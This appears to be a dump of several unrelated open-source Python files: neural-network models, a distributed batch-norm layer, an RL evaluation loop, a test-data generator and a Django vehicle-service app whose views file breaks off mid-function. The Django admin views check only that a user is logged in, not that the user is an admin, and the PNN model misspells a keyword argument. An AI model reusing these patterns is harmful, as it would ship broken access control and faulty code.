nn.ReLU(),
Conv(self.skip_channels, self.out_channels, 1, causal=self.causal)
)
def forward(self, x, c):
return self.wavenet(x, c)
def wavenet(self, tensor, c=None):
h = self.front_conv(tensor)
skip = 0
for i, f in enumerate(self.res_blocks):
h, s = f(h, c)
skip += s
out = self.final_conv(skip)
return out
def receptive_field_size(self):
num_dir = 1 if self.causal else 2
dilations = [2 ** (i % self.num_layers) for i in range(self.num_layers * self.num_blocks)]
return num_dir * (self.kernel_size - 1) * sum(dilations) + 1 + (self.front_channels - 1)
def remove_weight_norm(self):
for f in self.res_blocks:
f.remove_weight_norm()
|
sql/src/test/resources/joins/create_sample_table.py | MichelaSalvemini/Modelli_project | 677 | 10620 | #! /usr/bin/env python
from __future__ import print_function
import pandas as pd
import numpy as np
import argparse
def generate_csv(start_index, fname):
cols = [
str('A' + str(i)) for i in range(start_index, NUM_COLS + start_index)
]
data = []
for i in range(NUM_ROWS):
vals = (np.random.choice(NUM_DISTINCT_VALS) for j in range(NUM_COLS))
data.append(vals)
df = pd.DataFrame(data=data, columns=cols)
df.to_csv(fname, index=False, header=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Generate sample tables to test joins.')
parser.add_argument('--num-rows', '-r', type=int, default=100)
parser.add_argument('--num-cols', '-c', type=int, required=True)
parser.add_argument('--num-distinct-vals', '-d', type=int, required=True)
parser.add_argument('--num-cols-overlap', '-o', type=int, default=1)
args = parser.parse_args()
NUM_ROWS = args.num_rows
NUM_COLS = args.num_cols
NUM_DISTINCT_VALS = args.num_distinct_vals
num_overlap = args.num_cols_overlap
if num_overlap > NUM_COLS:
print('--num-cols-overlap cannot be greater than --num-cols')
import sys
sys.exit(1)
generate_csv(0, 'table_a.csv')
generate_csv(NUM_COLS - num_overlap, 'table_b.csv')
|
cookietemple/create/templates/cli/cli_python/{{ cookiecutter.project_slug_no_hyphen }}/tests/__init__.py | e2jk/cookietemple | 117 | 10628 | <gh_stars>100-1000
"""Test suite for the {{ cookiecutter.project_slug_no_hyphen }} package."""
|
bricks/ev3dev/modules/pybricks/robotics.py | ZPhilo/pybricks-micropython | 115 | 10629 | # SPDX-License-Identifier: MIT
# Copyright (c) 2018-2020 The Pybricks Authors
"""Pybricks robotics module."""
from _pybricks.robotics import DriveBase
|
rl_repr/batch_rl/evaluation.py | xxdreck/google-research | 23,901 | 10641 | <reponame>xxdreck/google-research<filename>rl_repr/batch_rl/evaluation.py
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Policy evaluation."""
import typing
import tensorflow.compat.v2 as tf
def evaluate(
env,
policy,
num_episodes = 10,
ctx_length = None,
embed_training_window = None,
state_mask_fn = None, # pylint: disable=g-bare-generic
):
"""Evaluates the policy.
Args:
env: Environment to evaluate the policy on.
policy: Policy to evaluate.
num_episodes: A number of episodes to average the policy on.
ctx_length: number of previous steps to compute context from.
embed_training_window: window size used during embed training.
state_mask_fn: state masking function for partially obs envs.
Returns:
Averaged reward and a total number of steps.
"""
total_timesteps = 0
total_returns = 0.0
def apply_mask(observation):
if state_mask_fn:
return tf.convert_to_tensor(state_mask_fn(observation.numpy()))
return observation
for _ in range(num_episodes):
timestep = env.reset()
if ctx_length:
states = [apply_mask(timestep.observation) for _ in range(ctx_length)]
actions = [
tf.zeros(policy.action_spec.shape)[None, :] for _ in range(ctx_length)
]
rewards = [[0.] for _ in range(ctx_length)]
latent_action = None
i = 0
while not timestep.is_last():
if embed_training_window and (i % embed_training_window == 0 or
embed_training_window <= 2):
latent_action = None
if ctx_length:
states.append(apply_mask(timestep.observation))
if len(states) > ctx_length:
states.pop(0)
actions.pop(0)
rewards.pop(0)
action = policy.act(
tf.stack(states, axis=1),
actions=tf.stack(actions, axis=1),
rewards=tf.stack(rewards, axis=1))
actions.append(action)
else:
if embed_training_window:
action, latent_action = policy.act(
apply_mask(timestep.observation), latent_action=latent_action)
else:
action = policy.act(apply_mask(timestep.observation))
timestep = env.step(action)
if ctx_length:
rewards.append(timestep.reward)
total_returns += timestep.reward[0]
total_timesteps += 1
i += 1
return total_returns / num_episodes, total_timesteps / num_episodes
|
bagua/torch_api/contrib/sync_batchnorm.py | mmathys/bagua | 635 | 10646 | <gh_stars>100-1000
# Copyright (c) Uber Technologies, Inc. and its affiliates.
# Copyright (c) 2021 Kuaishou AI Platform & DS3 Lab.
#
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from distutils.version import LooseVersion
import torch
from torch.autograd.function import Function
import torch.nn.functional as F
from torch.nn.modules.batchnorm import _BatchNorm
import bagua.torch_api as bagua
from bagua.torch_api.communication import allgather, allreduce
# Backward compat for old PyTorch
if not hasattr(torch.jit, "unused"):
torch.jit.unused = lambda x: x
_SYNC_BN_V2 = LooseVersion(torch.__version__) >= LooseVersion("1.5.0") and LooseVersion(
torch.__version__
) <= LooseVersion("1.6.0")
_SYNC_BN_V3 = LooseVersion(torch.__version__) >= LooseVersion("1.6.0")
_SYNC_BN_V4 = LooseVersion(torch.__version__) >= LooseVersion("1.9.0")
class SyncBatchNorm(_BatchNorm):
r"""Applies synchronous BatchNorm for distributed module with N-dimensional BatchNorm layer(s).
See `BatchNorm <https://pytorch.org/docs/stable/generated/torch.nn.BatchNorm2d.html?highlight=batchnorm#torch.nn.BatchNorm2d>`_ for more details.
Arguments:
num_features: Number of channels :math:`C` from the shape :math:`(N, C, ...)`.
eps: A value added to the denominator for numerical stability. Default: 1e-5.
momentum: The value used for the running_mean and running_var
computation. Can be set to ``None`` for cumulative moving average
(i.e. simple average). Default: 0.1.
affine: A boolean value that when set to ``True``, this module has
learnable affine parameters. Default: ``True``.
track_running_stats: A boolean value that when set to ``True``, this
module tracks the running mean and variance, and when set to ``False``,
this module does not track such statistics and always uses batch
statistics in both training and eval modes. Default: ``True``.
.. note:: Only GPU input tensors are supported in the training mode.
"""
def __init__(
self,
num_features,
eps=1e-5,
momentum=0.1,
affine=True,
track_running_stats=True,
):
super().__init__(num_features, eps, momentum, affine, track_running_stats)
def _check_input_dim(self, input):
if input.dim() < 2:
raise ValueError(
"expected at least 2D input (got {}D input)".format(input.dim())
)
def _run_bn(self, input):
return F.batch_norm(
input,
self.running_mean,
self.running_var,
self.weight,
self.bias,
self.training or not self.track_running_stats,
self.momentum,
self.eps,
)
@torch.jit.unused
def _maybe_run_sync_bn(self, input):
if bagua.get_world_size() == 1:
return self._run_bn(input)
return _SyncBatchNorm.apply(
input,
self.weight,
self.bias,
self.running_mean,
self.running_var,
self.eps,
self.momentum,
)
def forward(self, input):
# currently only GPU input is supported by underlying kernel from PyTorch
if not input.is_cuda:
raise ValueError("SyncBatchNorm expected input tensor to be on GPU")
self._check_input_dim(input)
if self.training and self.track_running_stats:
assert self.num_batches_tracked is not None
self.num_batches_tracked = self.num_batches_tracked + 1
if not self.training and self.track_running_stats:
return self._run_bn(input)
else:
return self._maybe_run_sync_bn(input)
@classmethod
def convert_sync_batchnorm(cls, module):
r"""Helper function to convert all :attr:`BatchNorm*D` layers in the model to
`torch.nn.SyncBatchNorm <https://pytorch.org/docs/stable/generated/torch.nn.SyncBatchNorm.html?highlight=syncbatchnorm#torch.nn.SyncBatchNorm>`_ layers.
Arguments:
module (nn.Module): Module containing one or more :attr:`BatchNorm*D` layers
Returns:
The original :attr:`module` with the converted :class:`torch.nn.SyncBatchNorm`
layers. If the original :attr:`module` is a :attr:`BatchNorm*D` layer,
a new :class:`torch.nn.SyncBatchNorm` layer object will be returned
instead.
.. note:: This function must be called before :meth:`~bagua.torch_api.distributed.BaguaModule.with_bagua` method.
Example::
>>> # Network with nn.BatchNorm layer
>>> model = torch.nn.Sequential(
... torch.nn.Linear(D_in, H),
... torch.nn.ReLU(),
... torch.nn.Linear(H, D_out),
... )
>>> optimizer = torch.optim.SGD(
... model.parameters(),
... lr=0.01,
... momentum=0.9
... )
>>> sync_bn_model = bagua.torch_api.contrib.sync_batchnorm.SyncBatchNorm.convert_sync_batchnorm(model)
>>> bagua_model = sync_bn_model.with_bagua([optimizer], GradientAllReduce())
"""
module_output = module
if isinstance(module, torch.nn.modules.batchnorm._BatchNorm):
module_output = SyncBatchNorm(
module.num_features,
module.eps,
module.momentum,
module.affine,
module.track_running_stats,
)
if module.affine:
with torch.no_grad():
module_output.weight = module.weight
module_output.bias = module.bias
module_output.running_mean = module.running_mean
module_output.running_var = module.running_var
module_output.num_batches_tracked = module.num_batches_tracked
if hasattr(module, "qconfig"):
module_output.qconfig = module.qconfig
for name, child in module.named_children():
module_output.add_module(name, cls.convert_sync_batchnorm(child))
del module
return module_output
class _SyncBatchNorm(Function):
@staticmethod
def forward(self, input, weight, bias, running_mean, running_var, eps, momentum):
input = input.contiguous()
size = input.numel() // input.size(1)
count = torch.tensor([size])
# calculate mean/invstd for input.
mean, invstd = torch.batch_norm_stats(input, eps)
count, mean, invstd = count.cuda(), mean.cuda(), invstd.cuda()
nums_ranks = bagua.get_world_size()
count_all = torch.tensor(
[torch.empty_like(count).cpu().detach().numpy() for _ in range(nums_ranks)]
).cuda()
mean_all = torch.tensor(
[torch.empty_like(mean).cpu().detach().numpy() for _ in range(nums_ranks)]
).cuda()
invstd_all = torch.tensor(
[torch.empty_like(invstd).cpu().detach().numpy() for _ in range(nums_ranks)]
).cuda()
allgather(count.unsqueeze(0), count_all)
allgather(mean.unsqueeze(0), mean_all)
allgather(invstd.unsqueeze(0), invstd_all)
if _SYNC_BN_V3:
counts_for_bngswc = count_all.view(-1).float().to(input.device)
else:
# backwards compatibility
counts_for_bngswc = count_all.view(-1).tolist()
# calculate global mean & invstd
mean, invstd = torch.batch_norm_gather_stats_with_counts(
input,
mean_all,
invstd_all,
running_mean,
running_var,
momentum,
eps,
counts_for_bngswc,
)
self.save_for_backward(input, weight, mean, invstd, count_all)
# apply element-wise normalization
return torch.batch_norm_elemt(input, weight, bias, mean, invstd, eps)
@staticmethod
def backward(self, grad_output):
grad_output = grad_output.contiguous()
saved_input, weight, mean, invstd, count_all = self.saved_tensors
need_input_grad, need_weight_grad, need_bias_grad = self.needs_input_grad[0:3]
# calculate local stats as well as grad_weight / grad_bias
sum_dy, sum_dy_xmu, grad_weight, grad_bias = torch.batch_norm_backward_reduce(
grad_output,
saved_input,
mean,
invstd,
weight,
need_input_grad,
need_weight_grad,
need_bias_grad,
)
if need_input_grad:
# synchronizing stats used to calculate input gradient.
allreduce(sum_dy, sum_dy)
allreduce(sum_dy_xmu, sum_dy_xmu)
if _SYNC_BN_V4:
# from 1.9.0 on we need a count tensor on all devices
# count_all is calculated as total count across all ranks in forward function
count_all = count_all.to(dtype=torch.int, device=grad_output.device)
elif _SYNC_BN_V2 or _SYNC_BN_V3:
# before 1.9.0 we need the count as an integer to compute means values
count = count_all.sum()
else:
# before 1.5.0, sum_dy was sum of means from every worker, so we just
# need to divide it by number of workers
count = bagua.get_world_size()
# backward pass for gradient calculation
# we are calling into a non-public undocumented function which broke moving to 1.9.0
# https://github.com/pytorch/pytorch/issues/57900
if _SYNC_BN_V4:
# from 1.9.0 on, sums and count parameters expected
grad_input = torch.batch_norm_backward_elemt(
grad_output,
saved_input,
mean,
invstd,
weight,
sum_dy,
sum_dy_xmu,
count_all,
)
else:
# before 1.9.0, mean parameters expected, not sums and count
grad_input = torch.batch_norm_backward_elemt(
grad_output,
saved_input,
mean,
invstd,
weight,
sum_dy / count,
sum_dy_xmu / count,
)
else:
grad_input = None
# synchronizing of grad_weight / grad_bias is not needed as distributed
# training would handle all reduce.
if weight is None or not need_weight_grad:
grad_weight = None
if weight is None or not need_bias_grad:
grad_bias = None
return grad_input, grad_weight, grad_bias, None, None, None, None, None, None
|
PNN/model.py | jingxiufenghua/rec-model | 1,323 | 10654 | <reponame>jingxiufenghua/rec-model
"""
Created on July 20, 2020
Updated on May 19, 2021
model: Product-based Neural Networks for User Response Prediction
@author: <NAME>(<EMAIL>)
"""
import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.regularizers import l2
from tensorflow.keras.layers import Embedding, Dense, Layer, Dropout, Input
from modules import DNN
class PNN(Model):
def __init__(self, feature_columns, hidden_units, mode='in', dnn_dropout=0.,
activation='relu', embed_reg=1e-6, w_z_reg=1e-6, w_p_reg=1e-6, l_b_reg=1e-6):
"""
Product-based Neural Networks
:param feature_columns: A list. sparse column feature information.
:param hidden_units: A list. Neural network hidden units.
:param mode: A string. 'in' IPNN or 'out'OPNN.
:param activation: A string. Activation function of dnn.
:param dnn_dropout: A scalar. Dropout of dnn.
:param embed_reg: A scalar. The regularizer of embedding.
:param w_z_reg: A scalar. The regularizer of w_z_ in product layer
:param w_p_reg: A scalar. The regularizer of w_p in product layer
:param l_b_reg: A scalar. The regularizer of l_b in product layer
"""
super(PNN, self).__init__()
# inner product or outer product
self.mode = mode
self.sparse_feature_columns = feature_columns
# the number of feature fields
self.field_num = len(self.sparse_feature_columns)
self.embed_dim = self.sparse_feature_columns[0]['embed_dim']
# The embedding dimension of each feature field must be the same
self.embed_layers = {
'embed_' + str(i): Embedding(input_dim=feat['feat_num'],
input_length=1,
output_dim=feat['embed_dim'],
embeddings_initializer='random_uniform',
embeddings_regularizer=l2(embed_reg))
for i, feat in enumerate(self.sparse_feature_columns)
}
# parameters
self.w_z = self.add_weight(name='w_z',
shape=(self.field_num, self.embed_dim, hidden_units[0]),
initializer='random_uniform',
regularizer=l2(w_z_reg),
trainable=True
)
if mode == 'in':
self.w_p = self.add_weight(name='w_p',
shape=(self.field_num * (self.field_num - 1) // 2, self.embed_dim,
hidden_units[0]),
initializer='random_uniform',
reguarizer=l2(w_p_reg),
trainable=True)
# out
else:
self.w_p = self.add_weight(name='w_p',
shape=(self.field_num * (self.field_num - 1) // 2, self.embed_dim,
self.embed_dim, hidden_units[0]),
initializer='random_uniform',
regularizer=l2(w_p_reg),
trainable=True)
self.l_b = self.add_weight(name='l_b', shape=(hidden_units[0], ),
initializer='random_uniform',
regularizer=l2(l_b_reg),
trainable=True)
# dnn
self.dnn_network = DNN(hidden_units[1:], activation, dnn_dropout)
self.dense_final = Dense(1)
def call(self, inputs):
sparse_inputs = inputs
sparse_embed = [self.embed_layers['embed_{}'.format(i)](sparse_inputs[:, i])
for i in range(sparse_inputs.shape[1])]
sparse_embed = tf.transpose(tf.convert_to_tensor(sparse_embed), [1, 0, 2]) # (None, field_num, embed_dim)
# product layer
row = []
col = []
for i in range(len(self.sparse_feature_columns) - 1):
for j in range(i + 1, len(self.sparse_feature_columns)):
row.append(i)
col.append(j)
p = tf.gather(sparse_embed, row, axis=1)
q = tf.gather(sparse_embed, col, axis=1)
if self.mode == 'in':
l_p = tf.tensordot(p*q, self.w_p, axes=2) # (None, hidden[0])
else: # out
u = tf.expand_dims(q, 2) # (None, field_num(field_num-1)/2, 1, emb_dim)
v = tf.expand_dims(p, 2) # (None, field_num(field_num-1)/2, 1, emb_dim)
l_p = tf.tensordot(tf.matmul(tf.transpose(u, [0, 1, 3, 2]), v), self.w_p, axes=3) # (None, hidden[0])
l_z = tf.tensordot(sparse_embed, self.w_z, axes=2) # (None, hidden[0])
l_1 = tf.nn.relu(tf.concat([l_z + l_p + self.l_b], axis=-1))
# dnn layer
dnn_x = self.dnn_network(l_1)
outputs = tf.nn.sigmoid(self.dense_final(dnn_x))
return outputs
def summary(self):
sparse_inputs = Input(shape=(len(self.sparse_feature_columns),), dtype=tf.int32)
Model(inputs=sparse_inputs, outputs=self.call(sparse_inputs)).summary()
|
vehicle/views.py | BernardAli/vehicle-service-mgt | 105 | 10682 | <filename>vehicle/views.py
from django.shortcuts import render,redirect,reverse
from . import forms,models
from django.db.models import Sum
from django.contrib.auth.models import Group
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required,user_passes_test
from django.conf import settings
from django.db.models import Q
def home_view(request):
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return render(request,'vehicle/index.html')
#for showing signup/login button for customer
def customerclick_view(request):
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return render(request,'vehicle/customerclick.html')
#for showing signup/login button for mechanics
def mechanicsclick_view(request):
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return render(request,'vehicle/mechanicsclick.html')
#for showing signup/login button for ADMIN(by sumit)
def adminclick_view(request):
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return HttpResponseRedirect('adminlogin')
def customer_signup_view(request):
userForm=forms.CustomerUserForm()
customerForm=forms.CustomerForm()
mydict={'userForm':userForm,'customerForm':customerForm}
if request.method=='POST':
userForm=forms.CustomerUserForm(request.POST)
customerForm=forms.CustomerForm(request.POST,request.FILES)
if userForm.is_valid() and customerForm.is_valid():
user=userForm.save()
user.set_password(<PASSWORD>)
user.save()
customer=customerForm.save(commit=False)
customer.user=user
customer.save()
my_customer_group = Group.objects.get_or_create(name='CUSTOMER')
my_customer_group[0].user_set.add(user)
return HttpResponseRedirect('customerlogin')
return render(request,'vehicle/customersignup.html',context=mydict)
def mechanic_signup_view(request):
userForm=forms.MechanicUserForm()
mechanicForm=forms.MechanicForm()
mydict={'userForm':userForm,'mechanicForm':mechanicForm}
if request.method=='POST':
userForm=forms.MechanicUserForm(request.POST)
mechanicForm=forms.MechanicForm(request.POST,request.FILES)
if userForm.is_valid() and mechanicForm.is_valid():
user=userForm.save()
user.set_password(<PASSWORD>)
user.save()
mechanic=mechanicForm.save(commit=False)
mechanic.user=user
mechanic.save()
my_mechanic_group = Group.objects.get_or_create(name='MECHANIC')
my_mechanic_group[0].user_set.add(user)
return HttpResponseRedirect('mechaniclogin')
return render(request,'vehicle/mechanicsignup.html',context=mydict)
#for checking user customer, mechanic or admin(by sumit)
def is_customer(user):
return user.groups.filter(name='CUSTOMER').exists()
def is_mechanic(user):
return user.groups.filter(name='MECHANIC').exists()
def afterlogin_view(request):
if is_customer(request.user):
return redirect('customer-dashboard')
elif is_mechanic(request.user):
accountapproval=models.Mechanic.objects.all().filter(user_id=request.user.id,status=True)
if accountapproval:
return redirect('mechanic-dashboard')
else:
return render(request,'vehicle/mechanic_wait_for_approval.html')
else:
return redirect('admin-dashboard')
#============================================================================================
# ADMIN RELATED views start
#============================================================================================
@login_required(login_url='adminlogin')
def admin_dashboard_view(request):
enquiry=models.Request.objects.all().order_by('-id')
customers=[]
for enq in enquiry:
customer=models.Customer.objects.get(id=enq.customer_id)
customers.append(customer)
dict={
'total_customer':models.Customer.objects.all().count(),
'total_mechanic':models.Mechanic.objects.all().count(),
'total_request':models.Request.objects.all().count(),
'total_feedback':models.Feedback.objects.all().count(),
'data':zip(customers,enquiry),
}
return render(request,'vehicle/admin_dashboard.html',context=dict)
@login_required(login_url='adminlogin')
def admin_customer_view(request):
return render(request,'vehicle/admin_customer.html')
@login_required(login_url='adminlogin')
def admin_view_customer_view(request):
customers=models.Customer.objects.all()
return render(request,'vehicle/admin_view_customer.html',{'customers':customers})
@login_required(login_url='adminlogin')
def delete_customer_view(request,pk):
customer=models.Customer.objects.get(id=pk)
user=models.User.objects.get(id=customer.user_id)
user.delete()
customer.delete()
return redirect('admin-view-customer')
@login_required(login_url='adminlogin')
def update_customer_view(request,pk):
customer=models.Customer.objects.get(id=pk)
user=models.User.objects.get(id=customer.user_id)
userForm=forms.CustomerUserForm(instance=user)
customerForm=forms.CustomerForm(request.FILES,instance=customer)
mydict={'userForm':userForm,'customerForm':customerForm}
if request.method=='POST':
userForm=forms.CustomerUserForm(request.POST,instance=user)
customerForm=forms.CustomerForm(request.POST,request.FILES,instance=customer)
if userForm.is_valid() and customerForm.is_valid():
user=userForm.save()
user.set_password(<PASSWORD>)
user.save()
customerForm.save()
return redirect('admin-view-customer')
return render(request,'vehicle/update_customer.html',context=mydict)
@login_required(login_url='adminlogin')
def admin_add_customer_view(request):
userForm=forms.CustomerUserForm()
customerForm=forms.CustomerForm()
mydict={'userForm':userForm,'customerForm':customerForm}
if request.method=='POST':
userForm=forms.CustomerUserForm(request.POST)
customerForm=forms.CustomerForm(request.POST,request.FILES)
if userForm.is_valid() and customerForm.is_valid():
user=userForm.save()
user.set_password(user.password)
user.save()
customer=customerForm.save(commit=False)
customer.user=user
customer.save()
my_customer_group = Group.objects.get_or_create(name='CUSTOMER')
my_customer_group[0].user_set.add(user)
return HttpResponseRedirect('/admin-view-customer')
return render(request,'vehicle/admin_add_customer.html',context=mydict)
@login_required(login_url='adminlogin')
def admin_view_customer_enquiry_view(request):
enquiry=models.Request.objects.all().order_by('-id')
customers=[]
for enq in enquiry:
customer=models.Customer.objects.get(id=enq.customer_id)
customers.append(customer)
return render(request,'vehicle/admin_view_customer_enquiry.html',{'data':zip(customers,enquiry)})
@login_required(login_url='adminlogin')
def admin_view_customer_invoice_view(request):
enquiry=models.Request.objects.values('customer_id').annotate(Sum('cost'))
print(enquiry)
customers=[]
for enq in enquiry:
print(enq)
customer=models.Customer.objects.get(id=enq['customer_id'])
customers.append(customer)
return render(request,'vehicle/admin_view_customer_invoice.html',{'data':zip(customers,enquiry)})
@login_required(login_url='adminlogin')
def admin_mechanic_view(request):
return render(request,'vehicle/admin_mechanic.html')
@login_required(login_url='adminlogin')
def admin_approve_mechanic_view(request):
mechanics=models.Mechanic.objects.all().filter(status=False)
return render(request,'vehicle/admin_approve_mechanic.html',{'mechanics':mechanics})
@login_required(login_url='adminlogin')
def approve_mechanic_view(request,pk):
mechanicSalary=forms.MechanicSalaryForm()
if request.method=='POST':
mechanicSalary=forms.MechanicSalaryForm(request.POST)
if mechanicSalary.is_valid():
mechanic=models.Mechanic.objects.get(id=pk)
mechanic.salary=mechanicSalary.cleaned_data['salary']
mechanic.status=True
mechanic.save()
else:
print("form is invalid")
return HttpResponseRedirect('/admin-approve-mechanic')
return render(request,'vehicle/admin_approve_mechanic_details.html',{'mechanicSalary':mechanicSalary})
@login_required(login_url='adminlogin')
def delete_mechanic_view(request,pk):
mechanic=models.Mechanic.objects.get(id=pk)
user=models.User.objects.get(id=mechanic.user_id)
user.delete()
mechanic.delete()
return redirect('admin-approve-mechanic')
@login_required(login_url='adminlogin')
def admin_add_mechanic_view(request):
userForm=forms.MechanicUserForm()
mechanicForm=forms.MechanicForm()
mechanicSalary=forms.MechanicSalaryForm()
mydict={'userForm':userForm,'mechanicForm':mechanicForm,'mechanicSalary':mechanicSalary}
if request.method=='POST':
userForm=forms.MechanicUserForm(request.POST)
mechanicForm=forms.MechanicForm(request.POST,request.FILES)
mechanicSalary=forms.MechanicSalaryForm(request.POST)
if userForm.is_valid() and mechanicForm.is_valid() and mechanicSalary.is_valid():
user=userForm.save()
user.set_password(user.password)
user.save()
mechanic=mechanicForm.save(commit=False)
mechanic.user=user
mechanic.status=True
mechanic.salary=mechanicSalary.cleaned_data['salary']
mechanic.save()
my_mechanic_group = Group.objects.get_or_create(name='MECHANIC')
my_mechanic_group[0].user_set.add(user)
return HttpResponseRedirect('admin-view-mechanic')
else:
print('problem in form')
return render(request,'vehicle/admin_add_mechanic.html',context=mydict)
@login_required(login_url='adminlogin')
def admin_view_mechanic_view(request):
mechanics=models.Mechanic.objects.all()
return render(request,'vehicle/admin_view_mechanic.html',{'mechanics':mechanics})
@login_required(login_url='adminlogin')
def delete_mechanic_view(request,pk):
mechanic=models.Mechanic.objects.get(id=pk)
user=models.User.objects.get(id=mechanic.user_id)
user.delete()
mechanic.delete()
return redirect('admin-view-mechanic')
@login_required(login_url='adminlogin')
def update_mechanic_view(request,pk):
mechanic=models.Mechanic.objects.get(id=pk)
user=models.User.objects.get(id=mechanic.user_id)
userForm=forms.MechanicUserForm(instance=user)
mechanicForm=forms.MechanicForm(request.FILES,instance=mechanic)
mydict={'userForm':userForm,'mechanicForm':mechanicForm}
if request.method=='POST':
userForm=forms.MechanicUserForm(request.POST,instance=user)
mechanicForm=forms.MechanicForm(request.POST,request.FILES,instance=mechanic)
if userForm.is_valid() and mechanicForm.is_valid():
user=userForm.save()
user.set_password(<PASSWORD>)
user.save()
mechanicForm.save()
return redirect('admin-view-mechanic')
return render(request,'vehicle/update_mechanic.html',context=mydict)
@login_required(login_url='adminlogin')
def admin_view_mechanic_salary_view(request):
mechanics=models.Mechanic.objects.all()
return render(request,'vehicle/admin_view_mechanic_salary.html',{'mechanics':mechanics})
@login_required(login_url='adminlogin')
def update_salary_view(request,pk):
mechanicSalary=forms.MechanicSalaryForm()
if request.method=='POST':
mechanicSalary=forms.MechanicSalaryForm(request.POST)
if mechanicSalary.is_valid():
mechanic=models.Mechanic.objects.get(id=pk)
mechanic.salary=mechanicSalary.cleaned_data['salary']
mechanic.save()
else:
print("form is invalid")
return HttpResponseRedirect('/admin-view-mechanic-salary')
return render(request,'vehicle/admin_approve_mechanic_details.html',{'mechanicSalary':mechanicSalary})
@login_required(login_url='adminlogin')
def admin_request_view(request):
return render(request,'vehicle/admin_request.html')
@login_required(login_url='adminlogin')
def admin_view_request_view(request):
enquiry=models.Request.objects.all().order_by('-id')
customers=[]
for enq in enquiry:
customer=models.Customer.objects.get(id=enq.customer_id)
customers.append(customer)
return render(request,'vehicle/admin_view_request.html',{'data':zip(customers,enquiry)})
@login_required(login_url='adminlogin')
def change_status_view(request,pk):
adminenquiry=forms.AdminApproveRequestForm()
if request.method=='POST':
adminenquiry=forms.AdminApproveRequestForm(request.POST)
if adminenquiry.is_valid():
enquiry_x=models.Request.objects.get(id=pk)
enquiry_x.mechanic=adminenquiry.cleaned_data['mechanic']
enquiry_x.cost=adminenquiry.cleaned_data['cost']
enquiry_x.status=adminenquiry.cleaned_data['status']
enquiry_x.save()
else:
print("form is invalid")
return HttpResponseRedirect('/admin-view-request')
return render(request,'vehicle/admin_approve_request_details.html',{'adminenquiry':adminenquiry})
@login_required(login_url='adminlogin')
def admin_delete_request_view(request,pk):
requests=models.Request.objects.get(id=pk)
requests.delete()
return redirect('admin-view-request')
@login_required(login_url='adminlogin')
def admin_add_request_view(request):
enquiry=forms.RequestForm()
adminenquiry=forms.AdminRequestForm()
mydict={'enquiry':enquiry,'adminenquiry':adminenquiry}
if request.method=='POST':
enquiry=forms.RequestForm(request.POST)
adminenquiry=forms.AdminRequestForm(request.POST)
if enquiry.is_valid() and adminenquiry.is_valid():
enquiry_x=enquiry.save(commit=False)
enquiry_x.customer=adminenquiry.cleaned_data['customer']
enquiry_x.mechanic=adminenquiry.cleaned_data['mechanic']
enquiry_x.cost=adminenquiry.cleaned_data['cost']
enquiry_x.status='Approved'
enquiry_x.save()
else:
print("form is invalid")
return HttpResponseRedirect('admin-view-request')
return render(request,'vehicle/admin_add_request.html',context=mydict)
@login_required(login_url='adminlogin')
def admin_approve_request_view(request):
enquiry=models.Request.objects.all().filter(status='Pending')
return render(request,'vehicle/admin_approve_request.html',{'enquiry':enquiry})
@login_required(login_url='adminlogin')
def approve_request_view(request,pk):
adminenquiry=forms.AdminApproveRequestForm()
if request.method=='POST':
adminenquiry=forms.AdminApproveRequestForm(request.POST)
if adminenquiry.is_valid():
enquiry_x=models.Request.objects.get(id=pk)
enquiry_x.mechanic=adminenquiry.cleaned_data['mechanic']
enquiry_x.cost=adminenquiry.cleaned_data['cost']
enquiry_x.status=adminenquiry.cleaned_data['status']
enquiry_x.save()
else:
print("form is invalid")
return HttpResponseRedirect('/admin-approve-request')
return render(request,'vehicle/admin_approve_request_details.html',{'adminenquiry':adminenquiry})
@login_required(login_url='adminlogin')
def admin_view_service_cost_view(request):
enquiry=models.Request.objects.all().order_by('-id')
customers=[]
for enq in enquiry:
customer=models.Customer.objects.get(id=enq.customer_id)
customers.append(customer)
print(customers)
return render(request,'vehicle/admin_view_service_cost.html',{'data':zip(customers,enquiry)})
@login_required(login_url='adminlogin')
def update_cost_view(request,pk):
updateCostForm=forms.UpdateCostForm()
if request.method=='POST':
updateCostForm=forms.UpdateCostForm(request.POST)
if updateCostForm.is_valid():
enquiry_x=models.Request.objects.get(id=pk)
enquiry_x.cost=updateCostForm.cleaned_data['cost']
enquiry_x.save()
else:
print("form is invalid")
return HttpResponseRedirect('/admin-view-service-cost')
return render(request,'vehicle/update_cost.html',{'updateCostForm':updateCostForm})
@login_required(login_url='adminlogin')
def admin_mechanic_attendance_view(request):
return render(request,'vehicle/admin_mechanic_attendance.html')
@login_required(login_url='adminlogin')
def admin_take_attendance_view(request):
mechanics=models.Mechanic.objects.all().filter(status=True)
aform=forms.AttendanceForm()
if request.method=='POST':
form=forms.AttendanceForm(request.POST)
if form.is_valid():
Attendances=request.POST.getlist('present_status')
date=form.cleaned_data['date']
for i in range(len(Attendances)):
AttendanceModel=models.Attendance()
AttendanceModel.date=date
AttendanceModel.present_status=Attendances[i]
print(mechanics[i].id)
print(int(mechanics[i].id))
mechanic=models.Mechanic.objects.get(id=int(mechanics[i].id))
AttendanceModel.mechanic=mechanic
AttendanceModel.save()
return redirect('admin-view-attendance')
else:
print('form invalid')
return render(request,'vehicle/admin_take_attendance.html',{'mechanics':mechanics,'aform':aform})
@login_required(login_url='adminlogin')
def admin_view_attendance_view(request):
form=forms.AskDateForm()
if request.method=='POST':
form=forms.AskDateForm(request.POST)
if form.is_valid():
date=form.cleaned_data['date']
attendancedata=models.Attendance.objects.all().filter(date=date)
mechanicdata=models.Mechanic.objects.all().filter(status=True)
mylist=zip(attendancedata,mechanicdata)
return render(request,'vehicle/admin_view_attendance_page.html',{'mylist':mylist,'date':date})
else:
print('form invalid')
